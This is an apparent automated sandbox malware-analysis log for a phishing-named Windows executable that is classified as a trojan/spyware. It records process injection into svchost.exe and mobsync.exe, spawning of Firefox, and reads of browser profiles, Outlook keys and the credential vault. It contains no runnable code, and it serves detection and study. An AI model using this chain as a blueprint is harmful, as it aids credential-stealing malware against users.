                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043FAB405_2_043FAB40
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043F6BD75_2_043F6BD7
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043FF43F5_2_043FF43F
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043314605_2_04331460
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043F75715_2_043F7571
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043DD5B05_2_043DD5B0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043F16CC5_2_043F16CC
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043FF7B05_2_043FF7B0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043F70E95_2_043F70E9
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043FF0E05_2_043FF0E0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043EF0CC5_2_043EF0CC
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043470C05_2_043470C0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0440B16B5_2_0440B16B
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0432F1725_2_0432F172
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0437516C5_2_0437516C
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0434B1B05_2_0434B1B0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043452A05_2_043452A0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043E12ED5_2_043E12ED
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0435B2C05_2_0435B2C0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043F132D5_2_043F132D
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0432D34C5_2_0432D34C
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0438739A5_2_0438739A
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043B9C325_2_043B9C32
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043FFCF25_2_043FFCF2
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043F7D735_2_043F7D73
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043F1D5A5_2_043F1D5A
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04343D405_2_04343D40
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0435FDC05_2_0435FDC0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04349EB05_2_04349EB0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043FFF095_2_043FFF09
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043FFFB15_2_043FFFB1
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04341F925_2_04341F92
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04303FD25_2_04303FD2
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04303FD55_2_04303FD5
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043AD8005_2_043AD800
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043438E05_2_043438E0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043D59105_2_043D5910
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043499505_2_04349950
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0435B9505_2_0435B950
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043B3A6C5_2_043B3A6C
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043FFA495_2_043FFA49
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043F7A465_2_043F7A46
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043DDAAC5_2_043DDAAC
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04385AA05_2_04385AA0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043E1AA35_2_043E1AA3
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043EDAC65_2_043EDAC6
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043FFB765_2_043FFB76
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0435FB805_2_0435FB80
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043B5BF05_2_043B5BF0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0437DBF95_2_0437DBF9
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_00151CB05_2_00151CB0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0014CB805_2_0014CB80
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0014AD805_2_0014AD80
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0014CDA05_2_0014CDA0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0014AED05_2_0014AED0
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0014AEC45_2_0014AEC4
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_001553405_2_00155340
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_001535405_2_00153540
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0016BA305_2_0016BA30
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0419E50B5_2_0419E50B
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0419E7415_2_0419E741
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0419E2885_2_0419E288
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_041A533C5_2_041A533C
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0419E3A35_2_0419E3A3
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0419D8085_2_0419D808
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0419CA985_2_0419CA98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B75130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BBF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BAEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B2B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B87E54 appears 102 times
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 04375130 appears 58 times
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 043BF290 appears 105 times
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 043AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 04387E54 appears 102 times
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: String function: 0432B970 appears 280 times
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: String function: 0062F8A0 appears 35 times
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: String function: 0061EC2F appears 68 times
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: String function: 00626AC0 appears 42 times
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, 00000000.00000003.2062568675.000000000374D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, 00000000.00000003.2056345964.00000000035A3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@11/10
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0064CE7A GetLastError,FormatMessageW,0_2_0064CE7A
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0063AB84 AdjustTokenPrivileges,CloseHandle,0_2_0063AB84
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0063B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_0063B134
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0064E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0064E1FD
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00646532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00646532
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0065C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0065C18C
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0060406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_0060406B
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeFile created: C:\Users\user\AppData\Local\Temp\aut550.tmpJump to behavior
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: mobsync.exe, 00000005.00000002.3902827656.000000000293E000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3902827656.0000000002911000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2464262219.000000000291C000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2462008162.00000000028EF000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2462117569.0000000002911000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeReversingLabs: Detection: 42%
                Source: unknownProcess created: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe "C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe"
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe"
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeProcess created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"
                Source: C:\Windows\SysWOW64\mobsync.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe"Jump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeProcess created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\mobsync.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeStatic file information: File size 1208320 > 1048576
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: mobsync.pdbGCTL source: svchost.exe, 00000002.00000003.2244014500.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2244035599.0000000003431000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2243889902.000000000341B000.00000004.00000020.00020000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000004.00000002.3903019031.0000000000608000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uxnRAYhIPZRPiA.exe, 00000004.00000000.2197419615.00000000003AE000.00000002.00000001.01000000.00000005.sdmp, uxnRAYhIPZRPiA.exe, 00000006.00000002.3902431291.00000000003AE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, 00000000.00000003.2061270597.0000000003480000.00000004.00001000.00020000.00000000.sdmp, Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, 00000000.00000003.2053926155.0000000003620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2275476735.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2275476735.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2181650886.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2179858851.0000000003700000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2277653392.0000000003F93000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3903807433.0000000004300000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3903807433.000000000449E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2283578724.000000000414B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, 00000000.00000003.2061270597.0000000003480000.00000004.00001000.00020000.00000000.sdmp, Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, 00000000.00000003.2053926155.0000000003620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2275476735.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2275476735.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2181650886.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2179858851.0000000003700000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, mobsync.exe, 00000005.00000003.2277653392.0000000003F93000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3903807433.0000000004300000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3903807433.000000000449E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2283578724.000000000414B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mobsync.pdb source: svchost.exe, 00000002.00000003.2244014500.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2244035599.0000000003431000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2243889902.000000000341B000.00000004.00000020.00020000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000004.00000002.3903019031.0000000000608000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: mobsync.exe, 00000005.00000002.3902827656.0000000002899000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3904399243.000000000492C000.00000004.10000000.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000006.00000002.3903868529.0000000002E9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2570901643.0000000038D4C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: mobsync.exe, 00000005.00000002.3902827656.0000000002899000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3904399243.000000000492C000.00000004.10000000.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000006.00000002.3903868529.0000000002E9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2570901643.0000000038D4C000.00000004.80000000.00040000.00000000.sdmp
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0061E01E LoadLibraryA,GetProcAddress,0_2_0061E01E
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00626B05 push ecx; ret 0_2_00626B18
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00D493B0 push esi; ret 0_2_00D493B4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004143C1 push cs; ret 2_2_004143C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403070 push eax; ret 2_2_00403072
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004120AF push ebp; retf 2_2_004120B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418172 push esi; retf 2_2_0041817D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AADE push ebp; iretd 2_2_0040AAE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414344 push cs; ret 2_2_004143C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417C7C push esi; iretd 2_2_00417C7F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413D3D push esp; ret 2_2_00413D3E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040CE68 push ecx; retf 2_2_0040CE6B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B309AD push ecx; mov dword ptr [esp], ecx2_2_03B309B6
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043027FA pushad ; ret 5_2_043027F9
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0430225F pushad ; ret 5_2_043027F9
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0430283D push eax; iretd 5_2_04302858
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_043309AD push ecx; mov dword ptr [esp], ecx5_2_043309B6
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_00158330 pushfd ; retf 5_2_0015833B
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_00152414 push ecx; retf 5_2_0015244C
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_00154C09 push esi; iretd 5_2_00154C0C
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_00150CCA push esp; ret 5_2_00150CCB
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0015ED60 push esi; retf 5_2_0015ED6B
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_00160E12 push edx; iretd 5_2_00160E13
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_00160FE1 push cs; ret 5_2_00160FE2
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0014F03C push ebp; retf 5_2_0014F03D
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_001550FF push esi; retf 5_2_0015510A
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_00147A6B push ebp; iretd 5_2_00147A6D
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0419469F push edi; ret 5_2_041946A2
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_041A0695 push ebx; ret 5_2_041A0696
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_041957E0 push esp; ret 5_2_041957E1
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_04197140 push ss; ret 5_2_04197143
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_041A5182 push eax; ret 5_2_041A5184
